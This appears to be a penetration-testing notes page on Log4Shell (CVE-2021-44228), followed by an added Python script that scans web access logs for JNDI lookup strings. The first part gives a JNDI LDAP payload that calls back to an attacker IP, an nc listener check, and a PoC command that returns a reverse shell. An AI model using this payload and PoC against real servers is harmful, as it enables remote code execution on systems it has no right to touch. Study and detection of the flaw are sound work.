# Log4Shell

Check this [article](https://www.tomitribe.com/blog/cve-2021-44228-log4shell-vulnerability/) for more info.

To check whether a target is vulnerable to Log4Shell, use a JNDI lookup payload:

```
${jndi:ldap://10.8.0.178:4444/a}
```

Then URL-encode it and send it through Burp after intercepting the request:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FzQpt16723WQGTmlXTBZH%2FLog4Shell.png?alt=media&#x26;token=9f0f50f0-bceb-4ac0-9a23-408e73559955" alt=""><figcaption></figcaption></figure>

Listening on nc:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FwMpP46IWxxOTCerR4g9Q%2FLog4Shell-1.png?alt=media&#x26;token=7469e974-4b82-406c-a455-5514eadb073a" alt=""><figcaption></figcaption></figure>

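We get some weird characters back. The target has connected to our listener, and these raw bytes are the start of its LDAP request, which confirms that the lookup was evaluated.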

Then we can use [log4j-shell](https://github.com/kozmer/log4j-shell-poc/tree/main). Download [Java](https://www.oracle.com/in/java/technologies/javase/javase8-archive-downloads.html) and execute:

```
python3 poc.py --userip 10.8.1.208 --webport 8000 --lport 9001
```

Then send the payload:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FJKCz25fdTvoTdDJiTDFh%2FLog4Shell-2.png?alt=media&#x26;token=821c56bc-096c-4127-bf54-b13d37a75794" alt=""><figcaption></figcaption></figure>

Sending the URL-encoded payload in Burp Suite.

Now we get a shell back:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2F1XUw4DRSH7BrMJYPNNDK%2FLog4Shell-3.png?alt=media&#x26;token=11828929-772d-4eaa-b65b-d4725d296f36" alt=""><figcaption></figcaption></figure>
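
On the defender's side, the URL-encoded request used above leaves a recognisable trace in web access logs. The following is an added example, not part of the original notes or of the PoC project: it decodes each log line (including double encoding) and reports the callback host and port of any plain `${jndi:...}` lookup. The log format, the `q` parameter and the client addresses are constructed assumptions, and only the plain payload form shown on this page is matched.

```python
import re
from urllib.parse import unquote

# Plain-form JNDI lookup as used on this page: ${jndi:<scheme>://<host>[:port]/...}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(log_lines):
    """Return one finding per log line that contains a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        match = JNDI_RE.search(fully_decode(line))
        if match:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],  # first field of the log line
                "scheme": match["scheme"].lower(),
                "callback": f'{match["host"]}:{match["port"] or "default"}',
            })
    return findings

# Constructed sample access-log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.55 - - [10/Dec/2021:10:00:07 +0000] '
    '"GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F10.8.0.178%3A4444%2Fa%7D HTTP/1.1" 200 431',
    '192.0.2.55 - - [10/Dec/2021:10:00:09 +0000] '
    '"GET /search?q=%2524%257Bjndi%253Aldap%253A%252F%252F10.8.0.178%253A4444%252Fa%257D HTTP/1.1" 200 431',
    '192.0.2.77 - - [10/Dec/2021:10:01:30 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit in the access log combined with an outbound connection from the application host to the reported callback address is the stronger signal; the log entry alone only shows that the string was sent.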
